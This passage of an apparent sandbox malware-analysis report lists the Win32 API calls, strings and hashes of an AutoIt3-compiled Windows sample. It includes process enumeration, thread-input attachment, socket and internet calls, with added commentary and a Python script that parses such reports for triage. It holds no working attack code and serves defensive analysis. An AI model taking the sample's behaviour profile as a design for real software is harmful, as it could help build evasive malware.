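Matching on API co-occurrence inside one function, rather than on single imports, is what makes these rules useful: AttachThreadInput or SetLayeredWindowAttributes alone are common in ordinary GUI code, while the combinations above are the ones that tell an analyst which functions to open first in the disassembly. The "ref" address reported is the first call in the record, which is where to start in IDA.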
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
APIs
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow
• String ID:
• API String ID: 2796087071-0
APIs
  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
• lstrlenW.KERNEL32(?), ref: 00434CF6
• lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
• lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
Strings
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
APIs
• SendMessageW.USER32 ref: 00448C69
• GetWindowLongW.USER32(?,000000EC), ref: 00448C91
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
• EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
• GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
• CloseHandle.KERNEL32(00000000), ref: 00433EC8
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Process$BaseCloseEnumHandleModuleModulesNameOpen
• String ID:
• API String ID: 4241681289-0
Strings
Similarity
• API ID: AllocateHeap
• String ID: [B
• API String ID: 1279760036-632041663
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
• GetStockObject.GDI32(00000011), ref: 00430258
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
• ShowWindow.USER32(00000000,00000000), ref: 0043027D
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00443CA6
• MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
• CloseHandle.KERNEL32(00000000), ref: 00443CF9
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
APIs
• GetWindowRect.USER32(?,?), ref: 00430BA2
• ScreenToClient.USER32(?,?), ref: 00430BC1
• ScreenToClient.USER32(?,?), ref: 00430BE2
• InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
• InterlockedExchange.KERNEL32(?,?), ref: 0044B603
• LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
• LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                  • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                                  • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                                                                  • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                                  • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FileName$OpenSave
• String ID: X
• API String ID: 3924019920-3081909835
• Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
• Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
• Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
• Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Variant$Copy$ContainedObject$ClearErrorLast
• String ID: AutoIt3GUI$Container
• API String ID: 2018493657-3941886329
• Opcode ID: 67da897eda1dfbe266f24d2aa24b4355ac2418a89100cfef55a9b130a410f978
• Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
• Opcode Fuzzy Hash: 67da897eda1dfbe266f24d2aa24b4355ac2418a89100cfef55a9b130a410f978
• Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
APIs
• GetProcAddress.KERNEL32(00000001,?), ref: 004543C6
• GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 004543DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: AddressProc
• String ID: AU3_FreeVar
• API String ID: 190572456-771828931
• Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
• Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
• Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
• Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
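The function entries above are easier to triage in bulk than by eye: the "APIs" lines give the call, the module, the visible arguments and the call-site address, and the "String ID" lines give the strings the function references. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox code. It parses those two line kinds out of a report excerpt, counts calls per module, pulls out every GetProcAddress call whose second argument is a literal export name (the run-time import resolution the "dynamically determine API calls" signature refers to), and flags strings that match an assumed AutoIt3 runtime marker list (AU3_, AutoIt3). The sample input is constructed from the entries shown on this page; the marker list and the hex-versus-literal heuristic are the author's assumptions, not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: "APIs" and "String ID" lines copied from the entries on this page.
SAMPLE_REPORT = """\
APIs
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
• String ID: X
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• String ID: AutoIt3GUI$Container
APIs
• GetProcAddress.KERNEL32(00000001,?), ref: 004543C6
• GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 004543DF
• String ID: AU3_FreeVar
"""

# One "APIs" bullet: optional subcall prefix, Api.MODULE(args), ref: address
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Assumed heuristic (not from the report): substrings that mark the AutoIt3 runtime.
AUTOIT_MARKERS = ("AU3_", "AutoIt3")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # address of the callee when the call sits in a subcall


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split a report excerpt into function entries; each 'APIs' header starts a new one."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in m.group("args").split(",") if a]
            current.calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
            continue
        m = STRING_ID_RE.match(line)
        if m and m.group("ids").strip():
            current.strings.extend(m.group("ids").strip().split("$"))  # '$' joins several strings
    return entries


def is_literal(arg: str) -> bool:
    """Assumed heuristic: '?' is an unresolved placeholder and an all-hex word is a number."""
    return arg != "?" and re.fullmatch(r"[0-9A-Fa-f]+", arg) is None


def triage(entries: List[FunctionEntry]) -> dict:
    dynamic_imports, markers, modules = [], set(), {}
    for entry in entries:
        for c in entry.calls:
            modules[c.module] = modules.get(c.module, 0) + 1
            # GetProcAddress(hModule, lpProcName): a literal name shows which export
            # is resolved at run time instead of through the import table.
            if c.api == "GetProcAddress" and len(c.args) >= 2 and is_literal(c.args[1]):
                dynamic_imports.append((c.ref, c.args[1]))
            markers.update(a for a in c.args if any(mk in a for mk in AUTOIT_MARKERS))
        markers.update(s for s in entry.strings if any(mk in s for mk in AUTOIT_MARKERS))
    return {"dynamic_imports": dynamic_imports, "autoit_markers": sorted(markers), "modules": modules}


if __name__ == "__main__":
    for key, value in triage(parse_entries(SAMPLE_REPORT)).items():
        print(key, value)
```

On the sample above the script reports one dynamically resolved export, AU3_FreeVar at 004543DF, and two AutoIt3 markers (AU3_FreeVar, AutoIt3GUI); a name that happens to consist only of hex digits would be misclassified as a number by the heuristic, which is the price of not having type information in the report text.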
APIs
• WideCharToMultiByte.KERNEL32(00000080,00000000,PI,00000001,?,?,00000000,?,0042D7C1,?,0042D7C1,00490D50,?,?,00000000,00000002), ref: 00422373
• GetLastError.KERNEL32 ref: 00422391
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide
• String ID: PI
• API String ID: 203985260-693334235
• Opcode ID: 77a505053532826b6252e66309e83475728e4269b05e0448849bd4dba9a5329f
• Instruction ID: f6cfcdd0da1bff07fd8c4de5175f2d601c9d85045a190aa3ed4ed41793fd0dcc
• Opcode Fuzzy Hash: 77a505053532826b6252e66309e83475728e4269b05e0448849bd4dba9a5329f
• Instruction Fuzzy Hash: 1A41B631700165FFCB20EF68EA809AF3775EB41314B9001ABF9205B291D7BD9D8197BA
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
• Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
• Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
• Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
                                                                                                                                                                  • API String ID: 3850602802-2096851135
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 0045134A
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
Strings
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• Sleep.KERNEL32(00000000), ref: 00476CB0
• GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
APIs
Strings
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
Strings
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
• wsprintfW.USER32 ref: 0045612A
Strings
Similarity
• API ID: MessageSendwsprintf
• String ID: %d/%02d/%02d
• API String ID: 3751067900-328681919
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                                                  • String ID: aeB
                                                                                                                                                                  • API String ID: 857135153-906807131
                                                                                                                                                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
• Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
• Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
• Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
• Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
• Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
• Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
Strings
Similarity
• API ID: Message
• String ID: AutoIt$Error allocating memory.
• API String ID: 2030045667-4017498283
• Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
• Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D